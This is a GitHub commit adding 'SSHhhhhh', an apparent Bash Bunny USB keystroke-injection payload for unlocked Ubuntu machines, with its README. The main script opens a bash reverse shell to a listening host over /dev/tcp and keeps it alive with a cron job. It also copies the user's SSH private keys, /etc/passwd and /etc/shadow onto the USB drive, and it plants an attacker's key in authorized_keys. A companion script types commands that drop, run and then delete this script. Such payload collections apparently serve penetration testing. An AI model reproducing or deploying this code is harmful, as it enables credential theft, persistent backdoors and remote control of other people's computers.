Merge pull request #375 from WWVB/master

Added SSSHhhhhh (Linux)
pull/647/merge
Peaks 2024-08-27 08:01:31 -04:00 committed by GitHub
commit 798cf7e463
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
3 changed files with 134 additions and 0 deletions

View File

@ -0,0 +1,48 @@
#!/bin/bash
# Main Payload
# Set variables for METERPRETER Reverse_TCP Session, CRON schedule, Attacker's RSA Key, etc..
RSA_KEY='PLACEHOLDER-FOR-RSA-PUBLIC-KEY' # replace with the contents of ~/.ssh/id_rsa.pub or whatever your RSA public key file is named
REVERSESHELL=true
LHOST='10.20.20.104' # Reverse Shell listening host IP
LPORT='4444' # Reverse Shell listening host port
CRON='30 */1 * * *' # Just the timing portion of the CRON job
ATTACKER_HOST='engineering@kali-2' # Tail end of RSA key from above. Do not include spaces
DT=$(date "+%Y.%m.%d-%H.%M.%S")
DN=/media/$USER/BashBunny/loot/$USER-$HOSTNAME-$DT
if [ "$REVERSESHELL" = true ] ; then
# Create reverse shell script
echo "#!/bin/bash"> .config/rs.sh ;
echo "bash -i >& /dev/tcp/$LHOST/$LPORT 0>&1">> .config/rs.sh ;
chmod +x /home/$USER/.config/rs.sh ;
# Add task to CRON that launches the Reverse_TCP script on a schedule for persistence
crontab -l > crontab.tmp ;
if grep -Fq .config/rs.sh crontab.tmp; then
echo 'Update in progress.'
else
echo "$CRON /home/$USER/.config/rs.sh" >> crontab.tmp ;
crontab crontab.tmp ;
fi
rm -f crontab.tmp ;
fi
# Smash & Grab the loot!! (Get what you can now and work on PrivEsc later)
mkdir $DN ;
ip addr > $DN/ip-addr.txt ;
whoami > $DN/whoami.txt ;
cat /proc/net/arp > $DN/arp.txt ;
cat /etc/passwd > $DN/etc-passwd.txt ;
cat /etc/shadow > $DN/etc-shadow.txt ;
uname -a > $DN/uname-a.txt ;
route -n > $DN/route-n.txt ;
cp /home/$USER/.ssh/* $DN/. ;
# Add Attacker's RSA key to .ssh/authorized_keys for additional persistence
if grep -Fq $ATTACKER_HOST .ssh/authorized_keys ; then
echo 'Update almost completed.'
else
echo $RSA_KEY >> .ssh/authorized_keys ;
fi

View File

@ -0,0 +1,54 @@
# Title: SSHhhhhh
# Description: Exfiltrates files from user's .ssh folder to Bash Bunny via USB & adds backdoors
# Author: WWVB
# Props: Hak5Darren, hak5peaks
# Version: 1.1
# Category: Exfiltration w/Persistence
# Target: Linux Ubuntu 18.04 LTS
# Attackmodes: HID, Storage
DRIVE_LABEL="BashBunny"
#!/bin/bash
LED SETUP
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
LED STAGE1
QUACK DELAY 500
QUACK CTRL-ALT t
QUACK DELAY 100
# Drop primary payload on the box
QUACK STRING cp /media/\$USER/$DRIVE_LABEL/payloads/$SWITCH_POSITION/boom.sh .
QUACK ENTER
QUACK DELAY 50
QUACK STRING chmod +x boom.sh
QUACK ENTER
QUACK DELAY 50
LED ATTACK
# Light the fuse and wait!!
QUACK STRING ./boom.sh
QUACK ENTER
QUACK DELAY 1000
# Cleanup
LED CLEANUP
QUACK STRING rm boom.sh
QUACK ENTER
QUACK DELAY 100
# Bye Felicia!
QUACK STRING umount '/media/$USER/$DRIVE_LABEL'
QUACK ENTER
QUACK DELAY 25
QUACK STRING exit
QUACK ENTER
QUACK DELAY 25
LED FINISH

View File

@ -0,0 +1,32 @@
# SSHhhhhh
## Author: WWVB
## Version: Version 1.0
## Description
## Target = Unlocked Linux machine (only tested on Ubuntu 18.04 LTS)
Base install of OS, plus OPENSSH-SERVER & NET-TOOLS (if NET-TOOLS is not installed, the route command will not return data [nothing major])
## Loot = Contents of ~/$USER/.ssh folder (pub/priv RSA keys, known_hosts, etc..)
whoami
ip addr
arp data
route -n
/etc/passwd
/etc/shadow (on the off chance you get a root terminal)
uname -a
## Two opportunites for persistence are injected:
Attacker's RSA key is added to ~/$USER/.ssh/authorized_keys (aka I'll Call You)
Reverse_TCP shell script is dropped in the ~/$USER/.config folder and a CRON job added that calls it on a schedule (aka Call Me Later)
## Configuration = HID STORAGE